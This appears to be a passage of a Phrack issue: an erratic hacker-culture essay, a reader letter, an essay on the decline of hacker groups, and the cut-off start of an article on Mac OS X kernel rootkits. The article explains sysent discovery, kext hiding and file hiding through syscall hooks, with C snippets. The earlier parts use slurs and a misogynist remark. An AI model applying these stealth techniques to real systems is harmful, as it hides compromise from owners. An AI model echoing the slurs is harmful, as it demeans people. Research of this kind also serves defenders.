defusor for your carefag:
https://www.youtube.com/watch?v=JzNku_x2SLA -- steve brule

[F9] Thank you. :) Where was I? So much to say...
https://www.youtube.com/watch?v=AHBYgbA0sU8

In The Hacker Manifest, there is a carnal desire to be heard. To be under-
stood. (Read /The Stand/ by Stephen King.
https://www.youtube.com/watch?v=NkKOeeYko7w) To explain that by which no
adult actually wishes to hear. (Havey ou noticed the off-by-one yet?) To
declare war in a child-like way. And yet it just cannot be heard.

Can it not be heard? Or does it not want to be heard? Ah... the rub.

Adults deny they're failing children. This is the message of The Hacker
Manifesto. Not directly-- of course not directly. It's so clear that The
Mentor++ in all his absolutely vivacious youthful brilliance-- push and
pop is not only mad at the adults for having failed them (wtf mom), but is
equally knowledgeable that his data these lines are leaking too long
supersedes the concept of authority. Indeed, it renders authority to be an
irrelevant object, perpetuated by fearful drones finding the floorboards of
their hilariously poorly constructed ships of code having their nails being
ripped out from under them in the form of exploits, engineering and overall
eclectic compromise. (Typos are fun.) INJECT INJECT

So what that The Mentor did not select the "proper" worsd? (Also known as
diction. Boundaries are useful and great to break.) So what that he made
typos? So what that his angst was so clear and apparent in his writing? So
what that he was an assertive carefag with his writing? SO FUCKING WHAT?
https://www.youtube.com/watch?v=0XoyDqFy5pU

He was correct. Deal with it. http://tinyurl.com/marshmelol

Those who cannot see that The Mentor was correct should perhaps attempt to
learn who they're up against (of course, they never will, because...):

          v  v  v  v  v  v

        This is our world now... the world of the electron and the switch,
the beauty of the baud.  We make use of a service already existing without
paying for what could be dirt-cheap if it wasn't run by profiteering
gluttons, and you call us criminals.  We explore... and you call us
criminals.  We seek after knowledge... and you call us criminals.  We
exist without skin color, without nationality, without religious bias...
and you call us criminals. You build atomic bombs, you wage wars, you
murder, cheat, and lie to us and try to make us believe it's for our own
good, yet we're the criminals.

        Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive
me for.

        I am a hacker, and this is my manifesto.  You may stop this
individual, but you can't stop us all... after all, we're all alike.

                                         ^  ^   ^

Thank you children. Off by one. But which way? ;-)

(Hola, Espana! https://www.youtube.com/watch?v=U-Oxx_YbYnM)

Welcome. You've got mail! Goshk, I had no idea that my password needed to
be changed! Thanks Steve Case,my password is fishing!

Mom got infected with a false punter once. It told her "your computer has
been FUCKED!!!" Over and over again. In a DOS terminal.

I couldn't stop it. I didn't know what it meant. I was young. I thought I
was just having fun, you know? It was hilarious to press "punt" and watch
people disappear. (Third person. First person. Literary techniques.)

Ah... Mom is letting her ego leak. F9 for me, darlings.

moar liek F8 amirite (Indeed. <3)

The enemy of our community is very much the script kiddie. Ah, but, as
hackers, you must understand what a script kiddie truly is. You are on the
right track: a script kiddie has an ego issue. But your mother would like
to explain verbosely her understanding of the script kiddie, for the script
kiddie is a metaphor for the floor 4 the enemy of your mind.

https://www.youtube.com/watch?v=UDf2r9DnVGU

Do you know what a script kiddie is? It's not someone who's just not
talented. It's not someone who simply uses the tools of this community--
no, it's much more than that. A script kiddie is someone who abuses the
knowledge they can't truly grasp for the sake of power. A script kiddie is
someone who takes what's been given to them-- the love and beauty of every
single passionate line of code per each exploit, dropper and packer-- and
simply gloats. Yeah, you're a hacker alright-- you hack emotions. And it's
not to say that you're not talented for hacking emotions-- it's an
important talent in a lot of regards. No, what gives script-kiddie the
disgusting charge it deserves is the way a script kiddie works: braggart;
liar. Thief.

Of course these are simply different kinds of artists, sure. Liars are
talented. Thieves have the slipperiest fingers around. (There is in fact
honor among thieves. Don't buy that prior rhetoric.) And in their own re-
gards, script kiddies have a special kind of talent.

They can convince you that they are a hacker because they look like one.

There's a world of difference between a script kiddie and a hacker. And it
binarily has nothing to do with the fact they didn't roll their own code.

A script-kiddie is not a hacker. Why? How? They use the tricks, do they
not?

They do. And they shouldn't. You should stop them. For their primary goal
is to feed and inflate their ego. Not hack.

We've taken it to understand for quite some time that a script kiddie is
not to be respected-- and this is correct. One who seeks to increase their
sense of fame over their passion-- or, rather, that their passion -is- in
fact their ego-- can be considered a hacker in some way or another. But we
should deny them this. We should simply lie. Kill the narcissist.

Is a child not a hacker because they only use Metasploit? Nay, say moms,
for the child is a hacker because they know how to USE Metasploit. One
cannot simply compromise Mordor even by executing AutoPwn-- mom's tried.
Mom failed. Mom is not a break-in artist like a lot of her children. Mom
can write exploits++ she simply sucks at executing them. (Or perhaps you
don't know the exploits your mother is capable of. Trixy thingsies. ;) pop

Is a child a script-kiddie because they use Metasploit? Nay, say moms, for
the same reasons listed above-- only a hacker would know what exploits to
run where after perusing a system's entryways. A script-kiddie gets upset
at the lack of capable elegance of mashing buttons like a fucking retard.

(Hackers understand the dualism of words like retard and faggot. Skids
don't.)

So are script kiddies hackers? Technically, yes. Logistically, fuck 'em.

[Alt+0153]

Why fuck them? Their ego gets in the way. It gets in their way. It gets in
your way. It gets in the community's way.

The hacker community is one of this world's best communities for the sake
of its strong desire for ego death. You know, killing attention whores?
Quite a worthy past-time of the hacker community. It deserves to be done
more, really.

Ego death is the core of the hacker. Ego life is the core of the script-
kiddie. Ah... binary. <3)))O and Neurosis

Let's use furries as a metaphor. Are all furries egomaniacs? Selfish
narciscists as a pox on the Internet? Of course not. Many furries are
talented. In fact, you may just discover that furries are thef auna of the
Internet. (They rock the root servers. No joke. You know what I mean
eyman.) Yet due to the nature of the furry community, there is an inherent
plague of narcissism, of taking credit for the artists they so deistically
worship. QUHTGLVHSQWIUHETHUEBHAOPQVNCPWET3220qalfafLHUEILW Erasure.)
Indeed, these furries act as a metaphor for 4 four floor ceil float [F9]
Good. These furries act as a metaphor for script kiddies. The skids.

(White Mantis is a very good furry artist...)

Skids narcissistically take advantage of your artwork and pretend to praise
you for it. Of course, they never praise you-- they're badass ahckers be-
cause they take advantage of you. And you poured your heart out into that
exploit too, didn't you? You stumbled into that bug and you travelled to
the darkest depths of the kernel for months-- even years!-- to understand
not only how to discover its presence, but equally, to harness it, to
throw a saddle on that dragon and ride it to root.

And they -bragged- about it? They smugly proclaimed their power because of
-your- research? Then they turned around and asked you, hey, where's the
next one? Man, that hit you gave me last time, gosh, that was so powerful,
so verys trong, may I have another and steal the fame you don't even want
you fucking nerd?

Skids aren't inherenty white-hats, no. But lots and lots of white-hats?
Yeah. Fucking skids.

White-hats have a desire to defend. But too many of them are drowning in
the mammal sauce (https://www.youtube.com/watch?v=_MbhPWud8kM) of their
exceedingly egotistical bullshit. Another metaphor could be said here, but
darlings, live for the swarm. StarCraft leak.

White-hats are not your enemy. This community needs defenders. Defenders
are the dualism to attackers. A good defender can stop a good attacker and
bring everything to a standstill. You know the scene:
https://www.youtube.com/watch?v=5oPsvq81n2A

Defenders assist your existance. Attackers assist your existance. For in
this community, we are one and or other but not xor: a ternary system.
Attack defend and blend.

Your enemy are the skids. Kill the skids by overdosing them. Taunt them.
But you must first give them the opportunity to kill their ego. For the
best hackers k https://www.youtube.com/watch?v=S0JfwiHjVIg [F9] [F9] [F9] 

u mad bro[F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] [F9] 

Hehe. Good. :)

For the best hackers have killed their egos. All that's left is the id...
and the superego.

More powerful than a white-hat!

Faster than a screaming zero-day!

Mom didn't watch much SuperMan... but you get the point. :)

The hacker community is so very diverse and wonderful. And it's all because
the true tinkerers of this community ahve found a variety of ways to
slaughter egos. Those egos that can't be killed with kindness and through
coersion? Well... you've read ZF0.

I'd like to remix something for you:

http://teacher.scholastic.com/activities/immigration
timeline_photos/1892_small_fullsize.jpg

>>> Give us your packers, your crackers, your exploit authors and strange
>>> artists, your Jolt-chugging CTF players competing just to play. The
>>> Mr. The Plagues spreading the plagues of their obfuscated payloads.
>>> Kill these, your egos, the tempest-noise of your science, we bite our
>>> thumb at thee who does not see my children are brilliant. And deserve
>>> steak.

Kill the skids. And ask your local kids: who the fuck are dids? For they
are tit-for-tat and one in the same rhythym..

----

Shouts: Fuck shouts. This is for all of you. :)

Haters: I love you. Refute me with your wicked science.

Closing notes:

WATCH

MISTER

ROBOT

VERY

CLOSELY

Take note of the inconsistencies. They're fun. Like... well. :)

First: https://www.youtube.com/watch?v=Wru2aDvmpT0

In conclusion: https://www.youtube.com/watch?v=zAB5AC9yhY0

And: https://www.youtube.com/watch?v=D9RfSYOfKD0

Ellipses.

====MOM FROM MESSAGE BEGIN====


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x03 - The P0 mailz ]=---------------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

        [ We received a lot of mails related to P0. Not sure why, we have
          nothing to do with them. We publish one of them here. ]

From: patagonico
Subject: P0

I think this can be separated in two parts: Tech and non-tech
Technical: Finding bugs in a huge codebase that is 20 year old is moot.
It's like giving the proverbial fish. The codebase will always stay
hungry, and buggy. You needed to teach the developers to fish bugs, 20
years ago. Software protections and automatic tools help, but you cannot
protect for logical flaws or injections. Also, for each bug you find,
devs introduce 1000. Bug hunters will be always outnumbered.

Non-tech: Moral high horse of good hackers is a physiological
testosterone-induced illusion whose main objective is to establish a
dominance hierarchy and help you have sex and pass your genes. It does
not work. There are no girls in infosec. The girls in infosec are men.
It is good or bad to report bugs? time will tell. Too a complex system
to make any predictions now. It might be better to live in a world where
weapons are outdated and countries attack each other with 0days. You see
what a bomb does to a kindergarten? 0days do not do that. 0days are
elegant weapons, for a more civilized age.


|--=[ EOF ]=-------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x06 of 0x10

|=-----------------------------------------------------------------------=|
|=--------------------=[ The Fall of Hacker Groups ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ by: Strauss ]=---------------------------=|
|=-----------------------=[ strauss@phrack.org ]=------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of Contents

0 - Intro
1 - Background
2 - Nowadays
3 - Conclusion
4 - Shouts
5 - References
6 - Notes


--[ 0 - Intro

The earlier, bigger part of hacking history often had congregations as
protagonists. From CCC in the early 80s to TESO in the 2000s, through LoD,
MoD, cDc, L0pht, and the many other sung and unsung teams of hacker heroes,
our culture was created, shaped, and immortalized by their articles, tools,
and actions.

This article discusses why recently we do not see many hacker groups
anymore, and why the ones we do, such as Anonymous and its satellite
efforts, do not succeed in having the same cultural impact as their
forefathers.


--[ 1 - Background

Hacking is, in its very essence, an underground movement. Those who take
part on it have always been the ones who (ab)used technology in ways beyond
the knowledge of the larger userbase. It is tightly linked to intense
efforts in unveiling previously unknown information as well as in sharing
these discoveries. These premises hold true for as long as we know hackers:
since computers had barely no users up until the informatic massification
of today.

The nature of the hacker interests intrinsically poses difficulties:
growing knowledge on anything is hard. It requires heavy research,
experimentation, and can turn into an endless journey if objectives are not
carefully set. Just like in any field of scientific studies, it calls for a
good amount of colaboration, an attitude which, luckily for hackers, was
greatly enabled by the advent of computer networks and, most notably, the
Internet.

Computer networks increasingly made it possible to transmit unlimited and
uncensored information across their geographical extent with little effort,
with little costs, and in virtually no time. From the communication
development standpoint, one would expect that the events that followed the
80s to our days would lead to a geometric progression in the number of
hacker communities. In effect, hacking has arguably grown. Hacker
communities, definitely not. So what went wrong?


--[ 2 - Nowadays

We live in days of limited creativity. Moreover, as contraditory as it may
seem, it looks particularly rare for creativity to arise from groups or
teams. Communities, rather than individuals, should be more intellectually
empowered to create, but lately we have been watching the force of the
solo, the age of the ego. That, of course, when we do see anything that
catches our attention for originality, which is an ever scarcer pleasure.

In "Time Wars" [1], Mark Fisher explains that post-fordism has taken us to
this catatonic inability to innovate. Our nearly obsessive compulsion for
work consumes not only our time, in the literal form of labor hours, but
our minds, by distracting us from everything else we could be doing
otherwise. These distractions include our unceasing connection to ubiquous
media (e.g. the frequent checks for new e-mail, or accesses to social
networks on mobile devices) as well as an increased concern with financial
stability and provisioning, a concern that grows as welfare is invariably
trimmed by both the governments and the private sector.

It is important to note that our capitalist worries are more deeply rooted
in us than might seem at first, even in the most politically diverse
people. Supporting oneself is not easy, it does not come for free. Getting
some education, finding a job, staying up-to-date... regardless of what
your aspirations are, whatever you feel obliged to do is probably a lot,
already. And it likely involves a prevalence of "minding your own
business".

The unsettlement created in our thoughts affects intellectual solidarity in
even more severe ways than it does individual creation. Simply put, if it
is already so difficult for one person to focus away from these
"distractions" and into inspired productivity, let alone for a group to
join in a true collective mind. The ties that bind collective-minded
parties together take dedication to build, and our egotistical concerns do
not help (see note "A"). Not only is commitment required for the actual
work to be accomplished, but also to identify the shared values and goals
that enable true human connectivity.

Notice this does not concern _collaboration_ as much as it does
_collectiveness_. Collaboration typically breaks down the creative process
in a way it can be incrementally achieved with very self-sufficient,
individualistic contributions. Such is the case in most open-source
software projects. Roles are very well segregated so that a minimum of
human integration is required, as far as most modern software development
processes go, anyway. A true "hive mind" [2] cannot exist without the
support from a stronger, more unisonant cognitive bond. Funny enough, the
popular variants of LOIC, the DDoS tool used by "Anonymous", contain a
"hive mind" feature (i.e. getting a target automatically from a given IRC
server and channel and firing your packets against it). You wish it was
that easy.

The concept of the "conscience collective" was first established by Emile
Durkheim who, in his 1893 book "The Division of Labor in Society",
expressed 'that the more primitive societies are, the more resemblances
(particularly as reflected in primitive religion) there are among the
individuals who compose them; inversely, the more civilized a people, the
more easily distinguishable its individual members', as put by R. Alun
Jones [3].

Well, following (or despite) the prosperous adoption of atheism and
agnosticism as professed in the Internet and other popular media, it is
understood that religious beliefs are in a low, taking a bit of what
socities traditionally saw as a point of unity. In fact, there seems to be
an ever growing search for uniqueness in the modern man, especially that
from the apparently overpopulated metropolises (see note "B"). In this
never-ending crowd of interesting, outstanding personas, we want to shine
somehow, to prove ourselves different and original. In the end, it turns
into a pointless battle, against God-knows-who, for apparent singularity.
Instead of reaching for the fellow man, we want to set ourselves apart, and
thus, remarkable.


--[ 3 - Conclusion

Modern life nearly conspires against the collective. We are tormented by a
relentless flow of information as well as the daily worries of an eternally
insecure, unwarranted life. Furthermore, we dread the thought of being
alike, of sharing multiple views and opinions. As such, we are turning
progressively judgemental of who we should be partnering with, on the basis
that "they do not understand". In hacking, it yet implicates on the
delicate subject of trust, which would require an essay on itself, given
the undeniable importance the matter has acquired over the years.

If our thoughts on creating hacker groups were to be summarized, this is
how they would look: No one ever feels like we do. They are not to be
trusted and we do not have the time for them. The only attitude consonant
to our search for a comfortable, safe life is to constrain ourselves to our
own limitations, ignore the intelligent life out there, and surrender to
the mediocracy that our society has condemned our leisure time to.


--[ 4 - Shouts

My only acknowledgements go to whoever reads this through and puts his/her
thoughts to it. I eagerly await for your comments.


--[ 5 - References

[1] "Time Wars", Mark Fisher - http://www.gonzocircus.com/xtrpgs/
      incubate-special-exclusive-essay-time-wars-by-mark-fisher/
[2] "Collective Consciousness", Wikipedia -
      http://en.wikipedia.org/wiki/Collective_consciousness
[3] Excerpt of "Emile Durkheim: An Introduction to Four Major Works",
      Robert Alun Jones - http://durkheim.uchicago.edu/Summaries/dl.html


--[ 6 - Notes

A) In respect to social networks, while they are a valid community-building
mechanism in nature, selfishness prevails in common usage, by means of the
indulgent pleasure that fuels chronic "pluggedness", at times voyeur, at
times exhibitionist and needy.

B) It is arguably the case, though, that the globalizing aspect of the
Internet has brought the feeling of upsetting commonality to the citizens
of even the more unpopulated places.


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x07 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------=[ Revisiting Mac OS X Kernel Rootkits ]=-----------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ fG! <phrack@put.as> ]=-------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of contents

  1 - Introduction
  2 - The classic problems
      2.1 - What is new since Tiger
      2.2 - Sysent table discovery techniques
      2.3 - Hiding the kext
      2.4 - Hiding files
      2.5 - Hiding processes
      2.6 - Modifying the syscall handler
  3 - Reading the filesystem from kernel land
      3.1 - Real short overview of VFS
      3.2 - The easy way - Apple loves rootkit authors!
      3.3 - The more complex way
      3.4 - Solving kernel symbols
  4 - Executing userland binaries from the kernel
      4.1 - Writing from kernel memory into userland processes
      4.2 - Abusing (again!) dyld to inject and run code
      4.3 - Finding the place to execute the injection
      4.4 - Ideas are great, execution is everything
      4.5 - The dynamic library
      4.6 - Hiding our tracks
  5 - Revisiting userland<->kernel communication
      5.1 - Character devices and ioctl
      5.2 - Kernel control KPI
      5.3 - Ideas for our own alternative channels
  6 - Anti-forensics
      6.1 - Cheap tricks to reduce our footprint
      6.2 - Attacking DTrace and other instrumentation features
          6.2.1 - FSEvents
          6.2.2 - kdebug
          6.2.3 - TrustedBSD
          6.2.4 - Auditing - Basic Security Module
          6.2.5 - DTrace
              6.2.5.1 - syscall provider
              6.2.5.2 - fbt provider
      6.3 - AV-Monster II
      6.4 - Bypassing Little Snitch
      6.5 - Zombie rootkits
  7 - Caveats & Detection
  8 - Final words
  9 - References
  10 - T3h l337 c0d3z


--[ 1 - Introduction

In Phrack #66, ghalen and wowie wrote about interesting OS X kernel
rootkit techniques. That article is almost 4 years old and 4 major OS X
releases behind. Today Mountain Lion is king and many of the presented
techniques are not valid anymore - Apple reacted and closed those "holes".

One hand is enough to count the number of known rootkits targetting
Apple's OS. The most recent public release was Rubylin [2], a simple
rootkit that works with Lion (v10.7) (if you can read Korean there is
a very interesting memory forensics analysis at [3]).

The commercial spyware industry recently leaked DaVinci (aka OS.X/Crisis),
a user/kernel rootkit with some interesting features and flaws [4]. There
are rumours about FinFisher but no OS X leak happened yet. Everything
else is too old and outdated.

The main goal of this article is to update public knowledge and
introduce some "new" techniques so both offensive and defensive sides
can improve. It is focused on the current version at the time of this
writing, Mountain Lion, v10.8.2.

The defensive knowledge and available tools are still poor. I hope
this article motivates others to invest time and resources to improve
this scenario. It is quite certain that the offensive knowledge is
significantly ahead.

I tried to make this article as complete as possible but there is so
much to work to be done that it is a never-ending story. Some of the
proposed solutions can be improved or implemented in different and/or
better ways. You are encouraged to improve or develop new approaches
and of course publish them. I also like to learn from others ;-)

I hope you enjoy this (long) journey.
fG!


--[ 2 - The classic problems

This section starts by introducing important changes made since Tiger.
Then it discusses the old sysent retrieval techniques and their problems,
and presents a solution compatible with past, current, and future OS
X versions.

It continues with improvements to classic rootkit features - hide and
avoid (easy) detection. It must be noticed that these were developed
before the in-kernel symbol resolution technique to be presented later,
so they might appear a bit unsophisticated. I think there is value in this
knowledge and that is why it is described under the original conditions.


----[ 2.1 - What is new since Tiger

The easiest and many favourite's spot to hook the system calls is the
sysent table - just replace a pointer and we are set. Apple has been
improving the defence of that "castle" by hiding the sysent table symbol
and moving its location.

In Mountain Lion the table is now located in read-only memory (not a
big problem anyway). Syscall hijacking techniques like these can be
easily found with basic analysis tools, but they are still interesting
and useful for other purposes as to be shown later.

Another important change is that the kernel module list (kmod_info_t) is
deprecated. Before, the kernel extension rootkit could be easily hidden
from kextstat by manipulating this list. Now we must patch an I/O Kit
OSArray class called sLoadedKexts to hide from tools that list loaded
kernel extensions. Snare was the first to publicly discuss this issue,
and the commercial spyware OS.X/Crisis the first (afaik) to implement
it. Its technique will be later described.

Mountain Lion finally introduced kernel ASLR. It might be harder to
develop and execute the necessary exploit to install the rootkit but
after that it is (mostly) business as usual.

Up to Snow Leopard, Apple removed the symbol table from the kernel space
so there was no easy way to solve non-exported symbols inside the kernel
extension or I/O Kit driver. This was changed in Lion by leaving the full
__LINKEDIT segment in kernel memory but marked as pageable. Snare shows
this in one of his posts [5] and rubilyn rootkit uses it. Beware that
the formula they use has a small problem - it assumes that the symbol
table is located at the beginning of __LINKEDIT. This is true in Lion
but not in Mountain Lion.

I will show you how a solution that is stable, simple, and compatible
with all OS X versions. Too good to be true! :-)


----[ 2.2 - Sysent table discovery techniques

As described in Phrack 66 article, Landon Fuller [6] was first to come
public with a technique to solve the removal of exported sysent symbol.
His technique is based on the distance between the (still) exported
nsysent symbol (the number of entries in the sysent table, aka, number
of syscalls) and sysent. The problem with this approach is that Apple
can move the location of sysent between releases - offsets will change
and the rootkit will fail and expose itself. Not acceptable!

Lets illustrate this with an example, starting with Mountain Lion 10.8.2:

$ nm /mach_kernel | grep nsysent
ffffff8000839818 D _nsysent

The location of sysent can be found by disassembling the kernel and
using one of the three functions that reference it:

- unix_syscall
- unix_syscall64
- unix_syscall_return

For 10.8.2 the sysent pointer will be located at 0xFFFFFF80008000D0
and the table located at 0xFFFFFF8000855840. Landon's formula does not
apply here.

In Lion 10.7.5 we have:

$ nm mach_kernel_10_7_5 | grep nsysent
ffffff8000846ed8 D _nsysent
And sysent located at 0xFFFFFF8000842A40.

This confirms Apple moving around the pointer between different
releases. Notice that all previous values are from kernel at disk so no
kernel ASLR slide is included. The slide value will be disclosed whenever
it is being used in the examples.

Another technique is described in The Mac Hacker's Handbook [7], released
in 2009 and targeting Leopard.

On page 332 there is a code snippet that searches memory for "something
that has the same structure as the sysent table.". The starting search
point is the nsysent symbol, increasing the memory pointer to lookup
and match sysent array elements.

That code snippet does not work with Snow Leopard because sysent array
is located before nsysent symbol. It must be modified to support specific
versions and releases.

These different examples demonstrate that Apple changes sysent location
between releases. A stable rootkit requires an universal technique.

The second technique can be adapted to cover all cases. First we would
scan memory addresses above nsysent and then below if initial search
failed. If nsysent also stops being exported we would need to base the
search in another symbol and continue the cat & mouse game.

The reference symbol problem can be easily solved using a feature of
x86 systems, the interrupt descriptor table (IDT). The IDT "is used
by the processor to determine the correct response to interrupts and
exceptions." [8]. The traditional implementation of syscalls is done via
interrupt 80. The response to this interrupt will be executed by a kernel
function pointed to by the IDT. IDT's location can be obtained using the
asm instruction "sidt" (store interrupt descriptor table register). It
returns the table location so the next step is to find out the address
of the interrupt 80 handler.

Once we have the interrupt 80 handler address we can find out the
base address of the kernel. Kernel ASLR does not matter here because
the handler address is always a valid kernel code location - we are
dynamically querying the system and not using fixed addresses. To find
the kernel base address is just a matter of searching memory back for
the magic value of the Mach-O header - 0xfeedfacf (64 bits) or 0xfeedface
(32 bits).

One (curious) property of kernel ASLR implementation is that memory
addresses in kernel and kexts Mach-O headers already contain the ASLR
slide, something that does not happen in userland ASLR'ed binaries. The
header in userland binaries is never updated so it is not synced with
the address where the binary is loaded at.

The next step is to process the Mach-O headers and find out where the
__DATA segment is located. The reason for this is that the sysent table
is located in there - we need to extract segment's start address and
boundaries. Now it is just a matter of searching memory for something
that matches the sysent table.

Are there any performance problems doing things like this? The sysent
location is found in less than a second even on a 5 year old Core 2 Duo
Macbook Pro. The performance impact can be considered meaningless.

This method was applied successfully when the first Mountain Lion
developer preview became available and still works up to 10.8.2.

You can find its implementation in the included source code at the end.
A userland version that uses /dev/kmem to extract the same information
is available at [9].

What is the difference against using any other exported symbol instead
of all the trouble with the interrupt handler? Honestly, it is just a
matter of personal preference and technical "prowess". A symbol that
breaks compatibility if removed could be used instead with very low risk
of Apple changing it. Later, we will need to use at least one KPI so
almost any symbol from it can be used as search's starting point.

Another solution is to use one MSR register involved in the SYSCALL
instruction. A good candidate is the MSR register number 0xC0000082
(MSR_IA32_LSTAR), which contains the SYSCALL entrypoint.

One way to get its value in 64 bits is the following (ripped from XNU):

#define rdmsr(msr,lo,hi) \
__asm__ volatile("rdmsr" : "=a" (lo), "=d" (hi) : "c" (msr))

static inline uint64_t rdmsr64(uint32_t msr)
{
    uint32_t lo=0, hi=0;
    rdmsr(msr, lo, hi);
    return (((uint64_t)hi) << 32) | ((uint64_t)lo);
}

Calling rdmsr64(0xC0000082) will return the kernel address that will
handle 64 bits syscalls via the SYSCALL interface. The register number
0x176 (MSR_IA32_SYSENTER_EIP) is the one we are interested at for 32
bits systems - it is used for 32 bits syscalls via SYSENTER.

These are just a few possibilities to retrieve a valid address inside
the running kernel and then find the start address of the kernel Mach-O
header and sysent location. The location of the Mach-O header will be
useful to compute the kernel ASLR value (the slide is stored in a kernel
variable but its symbol is not exported!).


----[ 2.3 - Hiding the kext

As mentioned before, the kernel module list is deprecated in favor of a
IOKit OSArray class called sLoadedKexts. This introduces a new problem:
how to find its location since we are talking about IOKIT C++. The
OS.X/Crisis spyware implemented an interesting solution. It leverages
a simple IOKit method that references sLoadedKexts to find the object
location.

The method is OSKext::lookupKextWithLoadTag [libkern/c++/OSKext.cpp]:

OSKext * OSKext::lookupKextWithLoadTag(uint32_t aTag)
{
    OSKext * foundKext = NULL;  // returned
    uint32_t count, i;

    IORecursiveLockLock(sKextLock);

    count = sLoadedKexts->getCount(); <- use this location, for example
    for (i = 0; i < count; i++) {
        OSKext * thisKext = OSDynamicCast(OSKext,
            sLoadedKexts->getObject(i));
        if (thisKext->getLoadTag() == aTag) {
            foundKext = thisKext;
            foundKext->retain();
            goto finish;
        }
    }
finish:
    IORecursiveLockUnlock(sKextLock);
    return foundKext;
}

There is no symbol resolution feature inside the Crisis kernel rootkit
- the symbol (__ZN6OSKext21lookupKextWithLoadTagEj) is solved by the
userland component and sent to the rootkit module via a sysctl. The
function that hides the rootkit starts by searching for the 0xE8 byte
corresponding to the IORecursiveLockLock() call. All searches are done
using hex patterns. It then uses fixed offsets to compute the location
of the array and modify it. The provided source code reimplements
this technique.

The search could be made easier (and portable?) by disassembling this
method. The good news is that we can have a x86/x64 disassembler inside
a kernel extension thanks to diStorm [19] (other libraries probably
work but I'm a fan of diStorm, in particular after the introduction of
the decompose interface). To statically compile diStorm just import the
source and include files into your rootkit project. You also need to
define SUPPORT_64BIT_OFFSET or uncomment it at config.h.

Assuming we have no method to find kernel symbols inside the rootkit
(this will be later developed), we can use the disassembling engine
to try to find the functions or methods that we are interested in. The
whole __text section can be disassembled and searched for instruction
patterns that are hopefully more stable than hex patterns.

Testing this approach I was able to find the method referenced above with
a precision of 100% or 50%. The different rates depend on how strict are
the search parameters due to some differences between compiler output in
kernel versions. I'm talking about the number of calls, jmps, jnz, jae,
which have small variations between some versions (compiler upgrades,
settings, etc). The performance is amazing - it takes 1 second to
disassemble and search the whole kernel using a high-end Intel i7 cpu.

The main problem of Crisis's approach is that it depends on fixed offsets
inside the OSArray class. If anything changes it will break compatibility
and potentially crash or expose the rootkit.

Disassembling the kernel is useful to find patterns and leveraging them
in different cases. It is not perfect and does not solve all our problems
but it is another helpful tool.


----[ 2.4 - Hiding files

Files are hidden by modifying (at least) three different syscalls:
getdirentries, getdirentriesattr, and getdirentries64. Nothing new and
thoroughly described before.

What usually happens is that only the filename is matched - that is the
information directly available from the structures available in those
three syscalls. This means that a filename to be hidden will be matched
in any folder, something that can raise suspicion if a common filename
is used. With a small effort we can do better and learn something in
the process.

Let's find out how to recover additional information to match specific
file or folder locations. Target function is getdirentries64 but the
concepts apply to the other two.

The structure that is commonly manipulated is:

struct direntry {
  __uint64_t  d_ino;      /* file number of entry */
  __uint64_t  d_seekoff;  /* seek offset (optional, used by servers) */
  __uint16_t  d_reclen;   /* length of this record */
  __uint16_t  d_namlen;   /* length of string in d_name */
  __uint8_t   d_type;     /* file type, see below */
  char d_name[__DARWIN_MAXPATHLEN]; /*entry name (up to MAXPATHLEN bytes)*/
}

The match is done against the field d_name, which only contains the
current file or folder without the full path. This is the reason why
most implementations only match the file anywhere in the filesystem.

Luckily for us, all syscalls functions prototypes contain the proc
structure as the first parameter. It contains enough information to
match the full pathname.

struct proc {
(...)
    struct  filedesc *p_fd;        /* Ptr to open files structure. */
(...)
}

struct filedesc {
    struct  fileproc **fd_ofiles;   /* file structures for open files */
    char    *fd_ofileflags;         /* per-process open file flags */
    struct  vnode *fd_cdir;         /* current directory */
    struct  vnode *fd_rdir;         /* root directory */
    int     fd_nfiles;              /* number of open files allocated */
    int     fd_lastfile;            /* high-water mark of fd_ofiles */
    (...)
};

For example, to display all the open files by an arbitrary process
calling getdirentries64, we could use the following code:

void show_all_openfiles(struct proc *p)
{
    // lock proc structure else we are asking for trouble
    (*proc_fdlock)(p);
    struct filedesc *fd = p->p_fd;
    if (fd != NULL)
    {
        // for some reason fd_nfiles is not useful for this
        int lastfile = fd->fd_lastfile;
        // show all open files for this proc
        for (int count = 0; count < lastfile; count++)
        {
            // fd_ofiles is an array of fileproc that contains file structs
            // for all open files
            struct fileproc *fp = fd->fd_ofiles[count];
            // we are only interested in files so match fg_type field
            if (fp != NULL &&
                fp->f_fglob != NULL &&
                fp->f_fglob->fg_type == DTYPE_VNODE)
            {
                // lock the vnode - fg_data cast depends on fg_type
                // type is vnode so we know fg_data will point to a vnode_t
                (*vnode_lock)((struct vnode*)fp->f_fglob->fg_data);
                struct vnode *vn = (struct vnode*)fp->f_fglob->fg_data;
                if (vn->v_name != NULL)
                {
                    printf("[%d] Filename: %s\n", count, vn->v_name);
                }
                (*vnode_unlock)((struct vnode*)fp->f_fglob->fg_data);
            }
        }
    }
    (*proc_fdunlock)(p);
}

The files listed by this function are not the files we want to hide but
the files opened by the binary calling this syscall. This information
can be used, for example, to find the path that a "ls" command is trying
to list. The full path can be extracted manually by iterating over the
vnodes of each file, or by using a KPI function (vn_getpath).

To build the path from vnodes, first we retrieve the vnode structure
correspondent to the file and then iterate over up to the filesystem
root - each vnode has a reference to its parent vnode.

struct vnode {
(...)
    const char *v_name;      /* name component of the vnode */
    vnode_t v_parent;        /* pointer to parent vnode */
(...)
}

Each path component can be sequentially matched until v_parent == NULLVP,
which means the filesystem root. If path matches what we want to hide
then it is a matter of removing that entry from direntry array as usual.

To find the folder or file being listed we can use the following trick,
which seems to hold true:

int lastfile = main_fd->fd_lastfile;
// lastfile has the information we are looking for
struct fileproc *last_fp = main_fd->fd_ofiles[lastfile];

The only word of caution is when shell expansion is involved. In this case
